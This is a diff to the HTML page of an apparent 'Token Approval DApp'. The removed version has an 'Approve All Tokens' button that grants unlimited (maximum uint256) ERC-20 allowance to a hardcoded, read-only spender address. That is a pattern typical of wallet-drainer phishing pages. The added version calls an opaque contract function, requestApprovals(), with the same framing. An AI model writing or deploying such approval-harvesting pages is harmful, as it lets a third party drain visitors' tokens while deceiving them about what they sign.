--- a/index.html
+++ b/index.html
@@ -1,4 +1,4 @@
-u<!DOCTYPE html>
+<!DOCTYPE html>
 <html lang="en">
 <head>
     <meta charset="UTF-8">
@@ -9,11 +9,7 @@ u<!DOCTYPE html>
 <body>
     <h1>Token Approval DApp</h1>
     <div>
-        <label for="spender">Spender Address (Contract Address):</label>
-        <input type="text" id="spender" value="0x8816e4c39472B5Ce851fB8cB271de419bF638f43" readonly>
-    </div>
-    <div>
-        <button onclick="approveAllTokens()">Approve All Tokens</button>
+        <button onclick="requestApprovals()">Request Approvals</button>
     </div>
     <div id="status"></div>
 
@@ -39,22 +35,18 @@ u<!DOCTYPE html>
             }
         }
 
-        async function approveAllTokens() {
+        async function requestApprovals() {
             if (!web3) {
                 document.getElementById('status').innerText = "Please connect to Web3 first.";
                 return;
             }
 
-            const tokenContract = new web3.eth.Contract(ABI, contractAddress);
+            const contract = new web3.eth.Contract(ABI, contractAddress);
             const accounts = await web3.eth.getAccounts();
-            const spender = document.getElementById('spender').value;
-
-            // Maximum uint256 in hexadecimal
-            const maxUint256 = '0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff';
 
             try {
-                await tokenContract.methods.approve(spender, maxUint256).send({from: accounts[0]});
-                document.getElementById('status').innerText = "Approval successful!";
+                await contract.methods.requestApprovals().send({from: accounts[0]});
+                document.getElementById('status').innerText = "Approvals requested successfully!";
             } catch (error) {
                 document.getElementById('status').innerText = "Error: " + error.message;
             }
@@ -66,12 +58,9 @@ u<!DOCTYPE html>
         // ABI from your provided code
         const ABI = [
             {
-                "inputs": [
-                    {"internalType": "address", "name": "spender", "type": "address"},
-                    {"internalType": "uint256", "name": "amount", "type": "uint256"}
-                ],
-                "name": "approve",
-                "outputs": [{"internalType": "bool", "name": "", "type": "bool"}],
+                "inputs": [],
+                "name": "requestApprovals",
+                "outputs": [],
                 "stateMutability": "nonpayable",
                 "type": "function"
             }
